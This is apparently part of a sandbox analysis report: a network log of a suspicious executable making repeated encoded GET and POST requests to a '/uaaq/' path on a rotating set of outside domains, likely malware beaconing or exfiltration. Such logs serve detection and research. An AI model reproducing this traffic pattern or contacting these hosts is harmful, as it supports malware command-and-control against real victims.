                                                                                    Location: http://ww11.www.tubidy.tech/
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    Content-Type: text/html


                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                    12  192.168.11.30  49766  146.148.34.125  80  3712  C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                    Dec 4, 2023 12:04:28.400446892 CET  423  OUT  GET /uaaq/?9pG0L=+fLke0FkZ8ddpf91rSuK7zl5QINwJbdABoU0VkbbyogRs1jBfiuiWgTdT60Kd54wcvqO12MKWygzxtqc9m8Iy6fCV4+OuKKc/Q==&XFs82=6R5Xx6907 HTTP/1.1
                                                                                    Host: www.tubidy.tech
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:04:28.523761988 CET    232    IN    HTTP/1.1 302 Found
                                                                                    Date: Mon, 04 Dec 2023 11:04:28 GMT
                                                                                    Server: Apache
                                                                                    Location: http://ww11.www.tubidy.tech/
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    Content-Type: text/html


                                                                                    Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                    13    192.168.11.30    49767    91.195.240.19    80    3712    C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp    Bytes transferred    Direction    Data
                                                                                    Dec 4, 2023 12:04:33.921359062 CET    698    OUT    POST /uaaq/ HTTP/1.1
                                                                                    Host: www.infinite-7.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.infinite-7.com
                                                                                    Referer: http://www.infinite-7.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=rOoNk3lcyTEBtg4ycnrhYAT3ZWm3zsHEwf21tu0wrQI+kcYb8f1odOx5S1MIzB6WFI/C/Yuo6+C3rCY1Z0xgU+bMtd/c3p8YKCFz2OCW64tm5+hopJdrwrajJIo56sUuetiUxhoIbFP5Xdr7nwilG9D4auR4KiEugq3QvyUvJXKnp4z8pg==
                                                                                    Dec 4, 2023 12:04:34.104410887 CET    755    IN    HTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 04 Dec 2023 11:04:34 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                    14    192.168.11.30    49768    91.195.240.19    80    3712    C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp    Bytes transferred    Direction    Data
                                                                                    Dec 4, 2023 12:04:36.630407095 CET    718    OUT    POST /uaaq/ HTTP/1.1
                                                                                    Host: www.infinite-7.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.infinite-7.com
                                                                                    Referer: http://www.infinite-7.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=rOoNk3lcyTEBtAIya0ThQATwW2m35MGswfq1tvggrlY+k8ob7u1oQux5dVMN9h6NFIjw/YSo6+G3rDo1ZHZjGebOrd/a0Z8YKCFz2KvB641m6ORorodos7akf4o5r8VGeti6xg0ubAL5Xfj7niKiRND6XOQwcnpQuLzshC40YF3shNfvuWeURkPDnWutTAVLVd5AaWw=
                                                                                    Dec 4, 2023 12:04:36.813222885 CET    755    IN    HTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 04 Dec 2023 11:04:36 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                    15    192.168.11.30    49769    91.195.240.19    80    3712    C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp    Bytes transferred    Direction    Data
                                                                                    Dec 4, 2023 12:04:39.333466053 CET    1635    OUT    POST /uaaq/ HTTP/1.1
                                                                                    Host: www.infinite-7.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.infinite-7.com
                                                                                    Referer: http://www.infinite-7.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:04:39.516618013 CET    755    IN    HTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 04 Dec 2023 11:04:39 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                    16    192.168.11.30    49770    91.195.240.19    80    3712    C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp    Bytes transferred    Direction    Data
                                                                                    Dec 4, 2023 12:04:42.035743952 CET    426    OUT    GET /uaaq/?XFs82=6R5Xx6907&9pG0L=mMAtnDth0zIbmmwbJQD8SlCQVGGtkMLB+9yssOEsh1d4l9lYjNEmW7ArbhIk2T6dCq7f547m+Me71T0/Rw5JLcbntfWt6c4bbw== HTTP/1.1
                                                                                    Host: www.infinite-7.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:04:42.218748093 CET    161    IN    HTTP/1.1 436
                                                                                    date: Mon, 04 Dec 2023 11:04:42 GMT
                                                                                    content-length: 0
                                                                                    server: NginX
                                                                                    connection: close


                                                                                    Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                    17    192.168.11.30    49771    133.130.64.24    80    3712    C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp    Bytes transferred    Direction    Data
                                                                                    Dec 4, 2023 12:04:48.006076097 CET    707    OUT    POST /uaaq/ HTTP/1.1
                                                                                    Host: www.resolution-pj.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.resolution-pj.com
                                                                                    Referer: http://www.resolution-pj.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=25PvDmxTPAZwJNPS0CCh26jU7Or/RMQixuSxAcq5sFqj8AcOtHpKF5Wk9eraDW3tGCGx8KEFWBgHh73uD2TApbPpN9wDb8xWnJotiSHyAi6ymSZqeXHr8zxHc7QJ6BCMcC+dmJSGVcjeqqniBnvbfM9m6CE4TgH5azI/nTEB99AEW5pXsg==
                                                                                    Dec 4, 2023 12:04:48.303261042 CET    267    IN    HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:04:48 GMT
                                                                                    Server: Apache
                                                                                    Last-Modified: Tue, 13 Sep 2022 05:08:13 GMT
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 1260
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Dec 4, 2023 12:04:48.303342104 CET    1314    IN
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><me


                                                                                    Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                    18    192.168.11.30    49772    133.130.64.24    80    3712    C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp    Bytes transferred    Direction    Data
                                                                                    Dec 4, 2023 12:04:50.807920933 CET    727    OUT    POST /uaaq/ HTTP/1.1
                                                                                    Host: www.resolution-pj.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.resolution-pj.com
                                                                                    Referer: http://www.resolution-pj.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=25PvDmxTPAZwb5zS1leh3ajT+Or/bsQmxuWxAYaXs3+j8hsO/zdKC5Wk1+rDM23mGCbO8KIFWBEHh6nuAHTDzrPrBdwBGsxWnJotiSiVAiyymBBqc2Hs1TxEb7QJrxCIcC/4mIPRVZ/eqrXiC2vcQM9snyFLUj+BViln3yYPuvYRXsFEraur+jKMIVYNigMMqdkV+6Q=
                                                                                    Dec 4, 2023 12:04:51.097749949 CET    267    IN    HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:04:50 GMT
                                                                                    Server: Apache
                                                                                    Last-Modified: Tue, 13 Sep 2022 05:08:13 GMT
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 1260
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Dec 4, 2023 12:04:51.097937107 CET | 1314 | IN |
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><me


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    19 | 192.168.11.30 | 49773 | 133.130.64.24 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:04:53.621731997 CET | 1644 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.resolution-pj.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.resolution-pj.com
                                                                                    Referer: http://www.resolution-pj.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:04:53.916392088 CET | 267 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:04:53 GMT
                                                                                    Server: Apache
                                                                                    Last-Modified: Tue, 13 Sep 2022 05:08:13 GMT
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 1260
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Dec 4, 2023 12:04:53.916464090 CET | 1314 | IN |
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><me


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    20 | 192.168.11.30 | 49774 | 133.130.64.24 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:04:56.431895971 CET | 429 | OUT | GET /uaaq/?9pG0L=77nPASVBGS1VUo/R/j6d44mDwP+QIahx3JuWX6aukgDTtShzh3giMrfi3qntC2nVHjeoyaY8HDsr1L/VBT/etq3vOO5xT7Atwg==&XFs82=6R5Xx6907 HTTP/1.1
                                                                                    Host: www.resolution-pj.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:04:56.721803904 CET | 267 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:04:56 GMT
                                                                                    Server: Apache
                                                                                    Last-Modified: Tue, 13 Sep 2022 05:08:13 GMT
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 1260
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Dec 4, 2023 12:04:56.721887112 CET | 1314 | IN |
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><me


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    21 | 192.168.11.30 | 49775 | 91.195.240.117 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:05:02.047329903 CET | 695 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.atlasmisc.org
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.atlasmisc.org
                                                                                    Referer: http://www.atlasmisc.org/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=It8BAak1/wRQhDlqmXthvYozKNfKFsSEuNNdrnsSAtvYJp3Mc7mSGVwpGazGYHF+3XBZqjbDmxEakPjXtVjPNVDcU/XVs0R8CSxO9wpMN10NTVugG8YaM/QjSgqe8L/AB1Kvf3dZkSTlCYxUeHw95+0qITTfHWFUZmuNPwNahIHrBUKjFg==
                                                                                    Dec 4, 2023 12:05:02.230380058 CET | 755 | IN | HTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 04 Dec 2023 11:05:02 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    22 | 192.168.11.30 | 49776 | 91.195.240.117 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:05:04.749331951 CET | 715 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.atlasmisc.org
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.atlasmisc.org
                                                                                    Referer: http://www.atlasmisc.org/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=It8BAak1/wRQhj1qn0Fhq4o0WdfKPMSIuNBdrlA4Af7YJIHMd6mSHVwpN6zHSnFP3Xd/qhfDmwgakKnXtkjMMFDaffXXjUR8CSxO9w9mN1sNTm2gHdYZBfQiCQqet7/EB1LCf2B3kUXlCdNUfWwyqe0sMTS+Izc5UnPVGD5V/ZS1ABmwCc6LjjFP0mik/RdYqbxu+48=
                                                                                    Dec 4, 2023 12:05:04.941766977 CET | 755 | IN | HTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 04 Dec 2023 11:05:04 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    23 | 192.168.11.30 | 49777 | 91.195.240.117 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:05:07.451911926 CET | 1632 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.atlasmisc.org
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.atlasmisc.org
                                                                                    Referer: http://www.atlasmisc.org/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:05:07.635247946 CET | 755 | IN | HTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 04 Dec 2023 11:05:07 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    24 | 192.168.11.30 | 49778 | 91.195.240.117 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:05:10.154187918 CET | 425 | OUT | GET /uaaq/?XFs82=6R5Xx6907&9pG0L=FvUhDsBmpCJoj3lGkDh7rJRDQZ/xWYuOs9BV8EopI6SMYb/NSZXNOV1HCqXbeEBh5mla6CDOuwUwzd7BjgPBM1LiYO3UkBsWTw== HTTP/1.1
                                                                                    Host: www.atlasmisc.org
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:05:10.336791039 CET | 161 | IN | HTTP/1.1 436
                                                                                    date: Mon, 04 Dec 2023 11:05:10 GMT
                                                                                    content-length: 0
                                                                                    server: NginX
                                                                                    connection: close


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    25 | 192.168.11.30 | 49779 | 65.108.122.245 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:05:15.980943918 CET | 713 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.mariannaserocka.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.mariannaserocka.com
                                                                                    Referer: http://www.mariannaserocka.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=K3dDErmwgWQgBJIxnXsYfBOUstVvZfStV6NSHWRpGtjsSppZ8mHLQgzeXwU7d65XCNxiOhYl3VeuggJaxIDe5P0dLLrW00YqtnRlyGoqGVQRYHe3uFSxV4CCph3+srDxk5+c4KGBxZG+ECZMTUlkOMedK5ktgiwHYHk/zX8qJztrbqM5TQ==
                                                                                    Dec 4, 2023 12:05:16.914872885 CET | 1340 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:05:16 GMT
                                                                                    Server: Apache/2
                                                                                    X-Powered-By: PHP/8.1.25
                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                    X-UA-Compatible: IE=edge
                                                                                    Link: <https://mariannaserocka.com/wp-json/>; rel="https://api.w.org/"
                                                                                    Upgrade: h2,h2c
                                                                                    Connection: Upgrade, close
                                                                                    Vary: Accept-Encoding,User-Agent
                                                                                    Content-Encoding: gzip
                                                                                    Content-Length: 11321
                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    26 | 192.168.11.30 | 49780 | 65.108.122.245 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:05:18.699153900 CET | 733 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.mariannaserocka.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.mariannaserocka.com
                                                                                    Referer: http://www.mariannaserocka.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=K3dDErmwgWQgCo4xgwwYXBOLnNVvS/SpV6RSHSAsBf3sSLhZzFfLRgzeYQUyDK5cCN0XOkwl3VaugkFax7rdoP0fGrrQw0YqtnRlyCIAGVIRY3u38n6wLoDw/x3+6rC4k5/74LqvxfK+EH9MTFlnAMebFZk+pTRMUAU12kgWe2A1e/gqUiq7SnaDFPr6865MnQ64d1U=
                                                                                    Dec 4, 2023 12:05:19.607378006 CET | 1340 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:05:18 GMT
                                                                                    Server: Apache/2
                                                                                    X-Powered-By: PHP/8.1.25
                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                    X-UA-Compatible: IE=edge
                                                                                    Link: <https://mariannaserocka.com/wp-json/>; rel="https://api.w.org/"
                                                                                    Upgrade: h2,h2c
                                                                                    Connection: Upgrade, close
                                                                                    Vary: Accept-Encoding,User-Agent
                                                                                    Content-Encoding: gzip
                                                                                    Content-Length: 11321
                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    27 | 192.168.11.30 | 49781 | 65.108.122.245 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:05:21.415843964 CET | 1650 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.mariannaserocka.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.mariannaserocka.com
                                                                                    Referer: http://www.mariannaserocka.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
